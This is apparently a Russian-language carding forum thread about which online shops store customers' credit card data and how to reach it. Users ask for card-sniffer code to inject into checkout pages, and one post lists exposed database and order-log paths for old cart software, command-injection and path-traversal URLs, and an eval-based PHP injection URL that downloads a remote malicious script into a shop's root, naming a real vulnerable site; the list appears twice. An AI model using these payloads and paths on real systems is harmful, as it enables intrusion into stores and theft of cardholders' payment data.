шопы,какие?
- Thread starter GTRS
- Start date
maximthird
VIP member
- Messages
- 659
- Reaction score
- 406
- Points
- 63
в тех где можно че то купить ))))
ну не все шопы хранят в себе сс,большинство просто перекидыват на билинг системы и там просиходит оплата,или они всё равно в лог или в бд попадают на сайте где находится шоп?
sweet_hack
Member
- Messages
- 17
- Reaction score
- 0
- Points
- 1
можешь код или пример сниффира привести?
свой скрипт вставлять на сраничку в шопе где идёт перенаправление на билинг?
код бы не мешало,выложите кому не трудно...пример
Last edited:
не понял....Дак ведь товар придет на биллинг адрес или я ошибаюсь????За ранее спасибо!!!!!
ismcard
Professional
- Messages
- 523
- Reaction score
- 92
- Points
- 28
Причем тут товар вообще ?
Шопы некоторые хранят данные некоторые нет надо искать так некто тебе такие шопы недаст да и это неузнать пока доступ неполучишь пробуй регайся в шопе пытайся что то оформить если процессинг идет через шоп то может быть данные хранятся если перекидывает на мерчант то вряд ли
Humon4ik
RIPPER
- Messages
- 73
- Reaction score
- 16
- Points
- 8
многие шопы хранят сс,к примеру,зен карт,оскомерц,валмарт и т.д,смотри в гугле баги в шопах
ClickCartPro
Законченное решение для электронных магазинов. Система позволяет управлять складом, отслеживать заказы, управлять показом баннеров и делать многое-многое другое. В стандартной конфигурации программа хранит базы данных открытыми на сервере.
http://www.server.com/data/site/admin_user.db
http://www.server.com/cp/data/site/admin_user.db
http://www.server.com/data/cp/site/admin_user.db
База admin_user содержит пароли администраторов сайта. =)
MetaLinks MetaCart2.sql
Система покупок, основанная на ASP + MS SQL. Уязвимость в программе позволяет атакующему получить доступ к базе данных.
http://www.server.com/database/metacart.mdb
http://www.server.com/metacart/database/metacart.mdb
WebDiscount eShop
Позволяет исполнять команды.
http://www.server.com/cgi-bin/eshop.pl?seite=;ls|
Shopping Cart
Позволяет исполнять команды.
http://www.server.com/cgi-local/shop.pl/page=;ls|
QuikStore
Удобное решение для совершения покупок с помощью интернет карточек. Уязвимость в программе позволяет получить доступ к файлам сервера.
http://www.server.com/cgi-bin/quikstore.cgi?page=../quikstore.cgi�html&cart_id=
Конфигурация хранится в файле: quikstore.cfg
Order Form v1.2
Открытая для просмотра директория : /Orders/ , /order/ , /orders/ , etc...
Открытая информация о заказах: order_log_v12.dat (иногда order_log.dat)
Seaside Enterprises EZMall 2000
Исполняемый файл: mall2000.cgi
Открытая для просмотра директория: /mall_log_files/
Открытая информация о заказах: order.log
PDGSoft's PDG Shopping Cart 1.5
Исполняемый файл: shopper.cgi
Открытая для просмотра директория: /PDG_Cart/
Открытая информация о заказах: order.log
Конфигурация хранится в файле: shopper.conf
Mercantec's SoftCart
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /orders/ и /pw/
Открытая информация о заказах: /orders/*.olf
Конфигурация хранится в файле: /pw/storemgr.pw
Perlshop
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /store/customers/ и /store/temp_customers/
Открытая информация о заказах: Файлы с цифровыми именами (8 знаков)
WebShop
Исполняемый файл: WebShop.cgi
Открытая для просмотра директория: /WebShop/
Открытая информация о заказах: /WebShop/templates/cc.txt и /WebShop/logs/cc.txt
И вот буквально только что , пока я тут писал о корзинках, мой батник скачал свежую порцию багтрэка и там... Ышо одна дырявая корзинка =)
Alan Ward's A-Cart
(http://www.alanward.net/acart/) - система осуществления покупок через Web, разработанная в ASP для Windows систем.
Файл базы данных acart2_0.mdb хранится в Web директории и доступен для загрузки удаленным пользователям. В файле содержится регистрационная информация пользователей совершивших покупку (Имя, адрес, номера кредитных карт).
---------- Сообщение добавлено в 17:51 ---------- Предыдущее сообщение размещено в 17:50 ----------
Множественные уязвимости в Shop Script Premium, PRO
Вот этот URL копирует злонамеренный скрипт temp.php прямо в корень Вашего сайта.
/index.php?hack=%24_GET%5Bhack2%5D%3Dstripcslashes%28%24_GET%5Bhack2%5D%29%3B+eval%28%24_GET%5Bhack2%5D%29%3B&hack2=copy%28%22http%3A%2F%2Fvideo-movie.com%2Ftemp%2Fc2007.txt%22%2C%22temp.php%22%29%3B
В адресной строке браузера этот же код выглядит так :
index.php?hack=%24_GET[hack2]%3Dstripcslashes(%24_GET[hack2])%3B+eval(%24_GET[hack2])%3B&hack2=copy("http%3A%2F%2Fvideo-movie.com%2Ftemp%2Fc2007.txt"%2C"temp.php")%3B
Пример уязвимого сайта : "b u b i s . r u" (удалить пробелы и кавычки). На этом сайте злонамеренный хакер, использовав уязвимость движка Shop Script PRO 2.0, "навешал" рекламных ссылок, причём на каждой странице сайта.
---------- Сообщение добавлено в 17:51 ---------- Предыдущее сообщение размещено в 17:51 ----------
А вообще секьюритлаб.ком в помощь
ClickCartPro
Законченное решение для электронных магазинов. Система позволяет управлять складом, отслеживать заказы, управлять показом баннеров и делать многое-многое другое. В стандартной конфигурации программа хранит базы данных открытыми на сервере.
http://www.server.com/data/site/admin_user.db
http://www.server.com/cp/data/site/admin_user.db
http://www.server.com/data/cp/site/admin_user.db
База admin_user содержит пароли администраторов сайта. =)
MetaLinks MetaCart2.sql
Система покупок, основанная на ASP + MS SQL. Уязвимость в программе позволяет атакующему получить доступ к базе данных.
http://www.server.com/database/metacart.mdb
http://www.server.com/metacart/database/metacart.mdb
WebDiscount eShop
Позволяет исполнять команды.
http://www.server.com/cgi-bin/eshop.pl?seite=;ls|
Shopping Cart
Позволяет исполнять команды.
http://www.server.com/cgi-local/shop.pl/page=;ls|
QuikStore
Удобное решение для совершения покупок с помощью интернет карточек. Уязвимость в программе позволяет получить доступ к файлам сервера.
http://www.server.com/cgi-bin/quikstore.cgi?page=../quikstore.cgi�html&cart_id=
Конфигурация хранится в файле: quikstore.cfg
Order Form v1.2
Открытая для просмотра директория : /Orders/ , /order/ , /orders/ , etc...
Открытая информация о заказах: order_log_v12.dat (иногда order_log.dat)
Seaside Enterprises EZMall 2000
Исполняемый файл: mall2000.cgi
Открытая для просмотра директория: /mall_log_files/
Открытая информация о заказах: order.log
PDGSoft's PDG Shopping Cart 1.5
Исполняемый файл: shopper.cgi
Открытая для просмотра директория: /PDG_Cart/
Открытая информация о заказах: order.log
Конфигурация хранится в файле: shopper.conf
Mercantec's SoftCart
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /orders/ и /pw/
Открытая информация о заказах: /orders/*.olf
Конфигурация хранится в файле: /pw/storemgr.pw
Perlshop
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /store/customers/ и /store/temp_customers/
Открытая информация о заказах: Файлы с цифровыми именами (8 знаков)
WebShop
Исполняемый файл: WebShop.cgi
Открытая для просмотра директория: /WebShop/
Открытая информация о заказах: /WebShop/templates/cc.txt и /WebShop/logs/cc.txt
И вот буквально только что , пока я тут писал о корзинках, мой батник скачал свежую порцию багтрэка и там... Ышо одна дырявая корзинка =)
Alan Ward's A-Cart
(http://www.alanward.net/acart/) - система осуществления покупок через Web, разработанная в ASP для Windows систем.
Файл базы данных acart2_0.mdb хранится в Web директории и доступен для загрузки удаленным пользователям. В файле содержится регистрационная информация пользователей совершивших покупку (Имя, адрес, номера кредитных карт).
---------- Сообщение добавлено в 17:51 ---------- Предыдущее сообщение размещено в 17:50 ----------
Множественные уязвимости в Shop Script Premium, PRO
Вот этот URL копирует злонамеренный скрипт temp.php прямо в корень Вашего сайта.
/index.php?hack=%24_GET%5Bhack2%5D%3Dstripcslashes%28%24_GET%5Bhack2%5D%29%3B+eval%28%24_GET%5Bhack2%5D%29%3B&hack2=copy%28%22http%3A%2F%2Fvideo-movie.com%2Ftemp%2Fc2007.txt%22%2C%22temp.php%22%29%3B
В адресной строке браузера этот же код выглядит так :
index.php?hack=%24_GET[hack2]%3Dstripcslashes(%24_GET[hack2])%3B+eval(%24_GET[hack2])%3B&hack2=copy("http%3A%2F%2Fvideo-movie.com%2Ftemp%2Fc2007.txt"%2C"temp.php")%3B
Пример уязвимого сайта : "b u b i s . r u" (удалить пробелы и кавычки). На этом сайте злонамеренный хакер, использовав уязвимость движка Shop Script PRO 2.0, "навешал" рекламных ссылок, причём на каждой странице сайта.
---------- Сообщение добавлено в 17:51 ---------- Предыдущее сообщение размещено в 17:51 ----------
А вообще секьюритлаб.ком в помощь
radiopotato
Member
- Messages
- 9
- Reaction score
- 1
- Points
- 1
Система Cart32 хранит инфу по шопам. Уязвимостей в последней версии в паблике нет.
